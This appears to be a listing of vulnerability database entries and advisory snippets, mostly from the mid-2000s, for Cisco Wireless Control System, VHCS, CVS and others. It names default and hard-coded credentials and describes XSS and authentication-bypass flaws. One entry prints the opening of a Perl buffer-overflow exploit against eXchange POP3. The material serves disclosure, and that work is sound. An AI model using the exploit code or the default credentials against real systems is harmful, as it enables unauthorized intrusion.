CVE-2006-3287
Cisco Wireless Control System (WCS) for Linux and Windows 4.01 and earlier uses a default administrator username "root" and password "public," which allows remote attackers to gain access aka bug CSCse21391...
CVE-2006-3289
CVE-2006-3289 denotes a cross-site scripting (XSS) vulnerability in the login page of Cisco Wireless Control System (WCS) HTTP interface for Linux and Windows, affected in versions prior to 3.2(51). The issue allows remote attackers to inject arbitrary web script or HTML via vectors involving a m...
CVE-2006-3285
The internal database in Cisco Wireless Control System (WCS) for Linux and Windows before 3.251 uses an undocumented, hard-coded username and password, which allows remote authenticated users to read, and possibly modify, sensitive configuration data aka bugs CSCsd15955...
Multiple Vulnerabilities in Wireless Control System
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES TH...
[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Wireless Control System
Cisco Security Advisory: Multiple Vulnerabilities in Wireless Control System Advisory ID: cisco-sa-20060628-wcs http://www.cisco.com/warp/public/707/cisco-sa-20060628-wcs.shtml Revision 1.0 For Public Release 2006 June 28 1600 UTC GMT -...
Virtual Hosting Control System 2.4.7.1 - Server_day_stats.php Multiple Cross-Site Scripting Vulnerabilities
Virtual Hosting Control System 2.4.7.1 - Server_day_stats.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/17790/info Virtual Hosting Control System is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitiz...
VHCS --- Virtual Hosting Control System Cross Site Scripting
---------------------------------------------------------- Aria-Security.net Advisory Discovered by: O.U.T.L.A.W www.Aria-security.net Gr33t to: A.u.r.a & R@1D3N & Smok3r ----------------------------------------------------------- Software: VHCS Link: http://www.vhcs.net Attack method: Cross Site...
Virtual Hosting Control System 2.4.7.1 - 'Server_day_stats.php' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/17790/info Virtual Hosting Control System is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code executed in the...
Default credentials
change_password.php in Virtual Hosting Control System (VHCS) 2.4.7.1 and earlier does not verify the old password when a user changes the password, which may allow remote attackers to gain unauthorized access...
CVE-2006-0685
The CVE-2006-0685 issue affects VHCS (Virtual Hosting Control System) up to version 2.4.7.1, where the check_login function in login.php does not exit on failed authentication. This enables a remote attacker to bypass authentication and gain unauthorized access to VHCS application scripts. The co...
Virtual Hosting Control System 2.2/2.4 - 'change_password.php' Current Password
source: https://www.securityfocus.com/bid/16600/info Virtual Hosting Control System (VHCS) is prone to multiple input and access vulnerabilities. VHCS is prone to an HTML-injection vulnerability and an authentication-bypass vulnerability. These issues could be exploited to gain administrative acces...
eXchange POP3 5.0.050203 - RPCT TO Remote Buffer Overflow
eXchange POP3 5.0.050203 - RPCT TO Remote Buffer Overflow !/usr/bin/perl -w for educational purposes only . use IO::Socket; if $ARGV0 print "\n write the target IP!! \n\n"; exit; $buffer2 = "\x90"x1999999; $mailf= "mail"; $rcptt ="rcpt to:"; $buffer = "\x41"x4100; $ret = "\x80\x1d\xdc\x02";...
CVE-2005-3902
VHCS (Virtual Hosting Control System) versions 2.2.0 through 2.4.6.2 are affected by a cross-site scripting (XSS) vulnerability in gui/errordocs/index.php. Attackers can inject arbitrary script or HTML via query strings that are reflected in an error message. The advisory entries (NVD CVE-2005-39...
Virtual Hosting Control System 2.2/2.4 - Error Message Cross-Site Scripting
source: https://www.securityfocus.com/bid/15538/info Virtual Hosting Control System is prone to cross-site scripting attacks. The vulnerability arises when error messages are rendered and could let an attacker inject hostile HTML and script code into the browser session of another user in the...
MCCS Multi Computer Control System DoS
DoS on internal UDP-based control protocol parsing...
CVS: Multiple vulnerabilities
Background: CVS (Concurrent Versions System) is an open-source network-transparent version control system. It contains both a client utility and a server. Description: Alen Zukich has discovered several serious security issues in CVS, including at least one buffer overflow (CAN-2005-0753), memory leaks...
[Full-Disclosure] Kernelpanik Labs Digest 2005-1
Hi and happy new year. This is an email digest with security fails recently published by Kernelpanik Labs http://www.kernelpanik.org Apache suEXEC Bypass -------------------- Small document about how to bypass isolating procedures, i.e. suEXEC, in Apache WebServer. English document:...
DEBIAN-CVE-2004-0778
CVS 1.11.x before 1.11.17, and 1.12.x before 1.12.9, allows remote attackers to determine the existence of arbitrary files and directories via the -X command for an alternate history file, which causes different error messages to be returned...
RHEL 2.1 / 3 : cvs (RHSA-2004:153)
Updated cvs packages that fix a client vulnerability that could be exploited by a malicious server are now available. Updated Apr 19 2004 The description text has been updated to include CVE-2004-0405 which was also fixed but not mentioned when this advisory was first released. There has been no...
security flaw
CVS 1.12.x through 1.12.8, and 1.11.x through 1.11.16, does not properly handle malformed "Entry" lines, which prevents a NULL terminator from being used and may lead to a denial of service crash, modification of critical program data, or arbitrary code execution...